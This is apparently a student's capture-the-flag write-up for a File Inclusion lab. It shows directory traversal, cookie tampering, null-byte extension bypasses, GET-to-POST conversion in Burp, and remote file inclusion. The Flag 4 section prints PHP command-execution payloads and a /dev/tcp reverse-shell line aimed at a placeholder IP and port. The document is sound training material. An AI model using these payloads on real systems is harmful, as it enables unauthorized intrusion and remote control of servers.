# File Inclusion


## Task 8 Challenge
I'm starting with the challenges, as the rest is already walked through in the tasks. No guidance on this one though

### Flag1
![JrPen-FileInclusion_task1.png](../images/JrPen-FileInclusion_task1.png)

OK, so the form is broken. If we take a quick look at the source, it's a get request instead of a POST... smart
![JrPen-FileInclusion_GET.png](../images/JrPen-FileInclusion_GET.png)

If we can't use the built in form, theres a few ways around this. The first thing that came to mind was CURL. A quick, easy way to send a request...

A quick google for the format and I ended up with the below command

![JrPen-FileInclusion_Curl.png](../images/JrPen-FileInclusion_Curl.png)

* -X: The Type of Request
* -F: A Field=Value string
* the last string is my target (no flag)

Those of you playing along at home may wonder why I have 4 "up-one-level" in the path. The simple answer is it was an educated guess. If the are asking for /etc/ then we're on a linux box. Linux tends to host in /var/www/html, so 3 would be fine. One of the great things about trying to access a directory by 'returning' to the root directory, is that even if you overshoot how many levels up you need to go, extras just put you in the exact same spot.

Finally and see what we get. Scrolling to the bottom of the response, we have a code.... huh. It seems we have found our flag

![JrPen-FileInclusion_CurlResponse.png](../images/JrPen-FileInclusion_CurlResponse.png)

If we had gotten it wrong, we can also see the directory passed back by the webpage. It was the default directory so 3 would have been enough.

The hints recommend Burp or Fixing the page source, whatever method works for you :-)

<hr>



### Flag2

So... We are told to refresh then get this page

![JrPen-FileInclusion_task2.png](../images/JrPen-FileInclusion_task2.png)

Huh... refresh then we arent allowed in... Did someone say cookies?
Lets take a look at our dev tools
![JrPen-FileInclusion_cookieBefore.png](../images/JrPen-FileInclusion_cookieBefore.png)

Now, guest sounds kinda boring dont you think? Lets try shake things up as an admin....

![JrPen-FileInclusion_cookieAfter.png](../images/JrPen-FileInclusion_cookieAfter.png)

Close the Dev tools and refresh.
![JrPen-FileInclusion_cookieAdmin.png](../images/JrPen-FileInclusion_cookieAdmin.png)

Now, isnt that more interesting :-)


... but wait, theres more. Where's the input? And we have some exceptions.
![JrnPen-FileInclusion_AdminFile.png](../images/JrnPen-FileInclusion_AdminFile.png)

It looks like that cookie might not be for an account name. It looks to be our file location... Let's try that out...

![JrnPen-FileInclusion_phpext.png](../images/JrnPen-FileInclusion_phpext.png)

It looks right, but we arent getting a file. You may notice the first exception has an error "No such file or directory". The path has a .php added to the end. That's not what we wanted. As we didnt add it, it likely added by the website. We've seen how to escape this before, by adding the null character at the end (%00). Lets give that a go.

![JrnPen-FileInclusion_Flag2.png](../images/JrnPen-FileInclusion_Flag2.png)

Great! We have our flag. A good takeaway from this is "just because the cookie looks like an account name, doesnt mean it is".

<hr>

### Flag 3

Time for challenge 3. Looks like a nice, standard input form.

![JnrPen-FileInclusion_Challenge3std.png](../images/JnrPen-FileInclusion_Challenge3std.png)

Running the standard escape gives a few bits of info

![JnrPen-FileInclusion_Ch3Exceptions.png](../images/JnrPen-FileInclusion_Ch3Exceptions.png)

1. We have the standard path, great
2. It looks like our special character are being dropped, thats annoying
3. We didnt ask for a .php file, but its looking for one anyway

Ok, so 2 things to work around, lets try the special characters first

* ....//....//....//etc//flag3 - Nope
* ../../../"etc/flag3" - Nope
* ../../../"etc/flag3/." - Nope

Well thats annoying... lets spin up burp and see whats going on...

![JnrPen-FileInclusion_Ch3stdGet.png](../images/JnrPen-FileInclusion_Ch3stdGet.png)

its URL encoding our request as a get, and adding another / to the location.
* Yea, that didnt help.....

Its a GET, Lets try a basic POST, not worry about the arguements, just to see if the method is allowed...

![JnrPen-FileInclusion_Ch3stdPOST.png](../images/JnrPen-FileInclusion_Ch3stdPOST.png)

... What do you know. It is. Finally something 'interesting'. Now that we know the page accepts POST messages, lets convert our message. About an hour of googling later, I've found that burp suite can actually convert for you... thats handy...

![JnrPen-FileInclusion_Ch3ConvertBody.png](../images/JnrPen-FileInclusion_Ch3ConvertBody.png)

Would you look at that; with our post its not dropping the special chars. Nice

![JnrPen-FileInclusion_Ch3SuccessfulPost.png](../images/JnrPen-FileInclusion_Ch3SuccessfulPost.png)

Thats one problem out of the way....

Now we can focus on the extention. In our last flag we used the NULL method, lets try that here.

![JnrPen-FileInclusion_Ch3Flag.png](../images/JnrPen-FileInclusion_Ch3Flag.png)

That was easier than the first issue... Nice.
<hr>

### Flag 4 - The challenge

OK, we have a form, looks the same as the others, and we can apply any technique.
![JrPen-FileInclusion_Playground.png](../images/JrPen-FileInclusion_Playground.png)

This one is harder than it looks though. While there are definately some directory traversal options, the user has been quite locked down.

* Directory Traversal is allowed
* No rights to anything fun though, /etc/password is 'empty', /proc, log poisoning etc have no rights
* Null Byte doesnt work

Really, all the Local File Exploits are a no-go here, but who says this is local exploits only? We were introduced to RFIs in task 6.

The first thing we need to do is create a 'remote' location. In the real world you would spin up a machine with a public IP, but here we are on the VPN so can host locally. Python has a simple HTTP server which is great for us. More options can be found in the [FileTransfer](../Craft/FileTransfer.ipynb) page.

I have made a new folder that I wish to expose. Then launch the server to host all files I have in the folder. With no arguements it is now hosted on 8000.

![Python_SimpleHttpServer.png](../images/HackerCraft/Python_SimpleHttpServer.png)

Now, to create a file to upload. As the form is already adding the .php extension, we can just create a php script to be executed. Save the file in the folder serving the PHP server.

> I picked <br>
> \<?php echo shell_exec("whoami");?>

> A reverse shell is also an option, but a bit much effort for this challenge <br>
> \<?php echo system("0<&196;exec 196<>/dev/tcp/[yourIP]/[yourPort]; sh <&196 >&196 2>&196"); ?>

On the remote site, you can now enter your server address and file to include.

![JrPen-FileInclusion_FirstRFI.png](../images/JrPen-FileInclusion_FirstRFI.png)

1. The URL entered in the form
2. The response of the script
3. The file being served from my server

Great! It Works! The challenge wasnt to work out the user running the webserver, it was to run the hostname command. Modify the RFI file to run the 'hostname' command instead and the flag is yours :-)

<hr>